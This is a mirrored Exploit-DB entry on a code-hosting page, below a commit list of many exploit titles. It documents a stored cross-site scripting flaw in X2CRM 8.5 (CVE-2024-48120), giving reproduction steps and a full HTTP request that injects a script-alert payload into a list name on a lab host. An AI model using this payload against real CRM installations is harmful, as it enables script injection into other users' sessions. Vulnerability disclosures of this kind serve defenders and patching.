bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/52098.NA
Exploit-DB 60175c9963 DB: 2025-04-14 
52 changes to exploits/shellcodes/ghdb

Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection
Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection

Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)

DataEase 2.4.0 - Database Configuration Information Exposure

Cosy+ firmware 21.2s7 - Command Injection

Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)

K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)
ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated)
ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)
ABB Cylon Aspect 3.07.02 - File Disclosure
ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)

Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover

CyberPanel 2.3.6 - Remote Code Execution (RCE)

IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow

Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)

KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)

MagnusSolution magnusbilling 7.3.0 - Command Injection

Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover

Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass

Sonatype Nexus Repository 3.53.0-01 - Path Traversal

Watcharr 1.43.0 - Remote Code Execution (RCE)

Webmin Usermin 2.100 - Username Enumeration
ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
ABB Cylon Aspect 3.08.01 - Arbitrary File Delete
ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
ABB Cylon Aspect 3.08.01 - Arbitrary File Delete

AquilaCMS 1.409.20 - Remote Command Execution (RCE)

Artica Proxy 4.50 - Remote Code Execution (RCE)

Centron 19.04 - Remote Code Execution (RCE)

ChurchCRM 5.9.1 - SQL Injection

CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)

CodeCanyon RISE CRM 3.7.0 - SQL Injection

Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS

Feng Office 3.11.1.2 - SQL Injection
flatCore 1.5 - Cross Site Request Forgery (CSRF)
flatCore 1.5.5 - Arbitrary File Upload
flatCore 1.5 - Cross Site Request Forgery (CSRF)
flatCore 1.5.5 - Arbitrary File Upload

GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)

Gnuboard5 5.3.2.8 - SQL Injection

LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection

Litespeed Cache 6.5.0.1 - Authentication Bypass

MiniCMS 1.1 - Cross Site Scripting (XSS)

MoziloCMS 3.0 - Remote Code Execution (RCE)

NEWS-BUZZ News Management System 1.0 - SQL Injection

PandoraFMS 7.0NG.772 - SQL Injection

phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)

PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)

ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)

RosarioSIS 7.6 - SQL Injection

Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS)
Typecho 1.3.0 - Race Condition
Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)
Typecho 1.3.0 - Race Condition
Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)

X2CRM 8.5 - Stored Cross-Site Scripting (XSS)

Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)

Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
2025-04-14 00:16:26 +00:00

31 lines
No EOL
2 KiB
Text
Raw Blame History

# Exploit Title: X2CRM 8.5 - Stored Cross-Site Scripting (XSS)
# Date: 12 September 2024
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://x2engine.com/
# Software Link: https://github.com/X2Engine/X2CRM
# Version: X2CRM v8.5
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-48120
1-) Log in to the system with any user account. Navigate to the “Opportunities” section from the top menu and select “Create List.” In the “Name” field of the new screen, enter the malicious XSS payload and click “Create.”
2-) Next, return to the “Opportunities” tab and click on “Lists” again. The stored XSS payload will be triggered.
XSS Trigger Request:
POST /x2crm/x2engine/index.php/opportunities/createList HTTP/1.1
Host: 192.168.1.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 390
Origin: http://192.168.1.108
Connection: keep-alive
Referer: http://192.168.1.108/x2crm/x2engine/index.php/opportunities/createList
Cookie: PHPSESSID=uijrtnp42qqo29vfkb4v0sps3i; YII_CSRF_TOKEN=Rkw1SWxTc1dpa0Z0OGdpb1RxY0ZGVDY5X3pPMzVFTDGjgT_kJmGLFkvRCi_Y9OO4f0QIHNTvqbSw1t9UVVXL4g%3D%3D; 5d8630d289284e8c14d15b14f4b4dc28=9d5b82f1240eb47cd73a20df560d9b3086847e33a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%223%22%3Bi%3A1%3Bs%3A4%3A%22test%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D; LoginForm[username]=test; LoginForm[rememberMe]=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i
YII_CSRF_TOKEN=Rkw1SWxTc1dpa0Z0OGdpb1RxY0ZGVDY5X3pPMzVFTDGjgT_kJmGLFkvRCi_Y9OO4f0QIHNTvqbSw1t9UVVXL4g%3D%3D&X2List%5Bname%5D=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&X2List%5Btype%5D=dynamic&X2List%5BassignedTo%5D=test2&X2List%5Bvisibility%5D=1&X2List%5BlogicType%5D=AND&X2List%5Battribute%5D%5B%5D=alternativeEmail&X2List%5Bcomparison%5D%5B%5D=%3D&X2List%5Bvalue%5D%5B%5D=test&yt0=Create
Reference in a new issue View git blame Copy permalink